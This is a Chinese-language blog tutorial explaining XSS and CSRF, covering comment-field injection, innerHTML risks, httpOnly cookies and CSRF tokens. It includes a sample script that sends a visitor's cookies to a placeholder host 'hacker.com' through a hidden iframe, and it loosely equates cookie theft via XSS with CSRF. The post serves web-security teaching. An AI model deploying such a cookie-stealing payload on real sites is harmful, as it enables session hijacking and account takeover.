XSS和CSRF

作者: Quilljou | 来源:发表于2017-08-06 21:29 被阅读72次

    xss(cross site script),跨站脚本攻击,简称本应该是css,但是为了避免和css层叠样式表冲突,退而求其次取xss.
    csrf(Cross-site request forgery),跨站请求伪造

    让我尝试用大白话来解释一下这两者的概念和如何防范。

    XSS概念

    在一些社交论坛,各种网站的评论区都是xss注入的高发区,也就是只要有用户输入的地方,就有可能发生xss注入。因为公民不一定是人民。

    假如你在评论区中留下了这样的评论。

    <script>
      while( true ) {
        alert('xss');
      }
    </script>
    

    这段评论前端不做任何处理发送到服务器后,后端也不做任何处理,后端直接将这段文字渲染出来。那么打开这个页面的人就会关不掉浏览器弹窗提示,可以说是遭到了xss攻击。

    当然这并没有造成太大的损失。如果把刚刚那段代码改成这样。

    <script>
      (function () {
        var cookie = document.cookie;
        var hackerURL = 'http://hacker.com/getCookie?cookie=';
        var url = hackerURL + encodeURI(cookie);
    
        var iframe = document.createElement('iframe');
        iframe.style.display = "none";
        iframe.src = url;
        document.body.appendChild(iframe);
      }())
    </script>
    

    这样你的cookie就被黑客盗取了。稍微了解服务端的人都知道cookie是用户的识别凭证。黑客拿到了这个cookie,就可以伪造用户,后果不堪设想。这就是下面要说的csrf了。

    还有一种情况。就是使用innerHTML.

    如果有的需求需要将用户的输入实时显示在页面上。比如说编辑器。

    编辑器可能需要使用html标签进行排版,如果用户输入上面例子中的代码,如果不对用户输入进行转义也会发生上面的xss注入攻击了。

    或者页面显示内容是使用innerHTML拼接的字符串,那么对于用户输入的部分就要额外小心。

    现在开源的高star编辑器一般都会对用户进行转义了。

    不一定是script标签才能执行js,任何带onload或者onclick事件的html标签都可能成为xss注入的载体。

    防范措施的根本是对用户输入进行转义。

    csrf

    xss是实现csrf的一种方式。当用户拿到用户的cookie之后就可以伪造用户进行黑客行为了。

    通过xss实现的csrf也叫做xsrf。

    我们可以设置cookie为httpOnly,这样js就不能获取cookie的值了。

    那么这时候黑客就改变机制。使用钓鱼网站。

    当你在某个网站登录了,比如说网上银行。这也意味着在浏览器中保存了cookie。当你同时点进入了一个黑客的链接。

    执行了黑客的脚本,这段脚本使用浏览器自带携带cookie的机制,可能会执行删帖,转账任何可能的操作。

    但是浏览器的同源政策限制了不能在js中发出跨域请求。

    那么我可以使用iframe或者img来模拟get请求。所以说网站服务端api的设计最好符合restful风格。使用get请求资源,put,delete,post修改资源。

    这样就增大了黑客伪造的难度,让我们的网站相对安全一些了。

    但是iframe还是可以模拟post请求啊。

    所以对于表单的提交需要使用令牌。令牌可以存储在浏览器中,提交表单的时候只有网站用户才会提交这个令牌到服务器进行校对。而黑客不知道这个令牌的存在也就无法伪造成功了。

    相关文章

      网友评论

        本文标题:XSS和CSRF

        本文链接:https://www.haomeiwen.com/subject/ylmnlxtx.html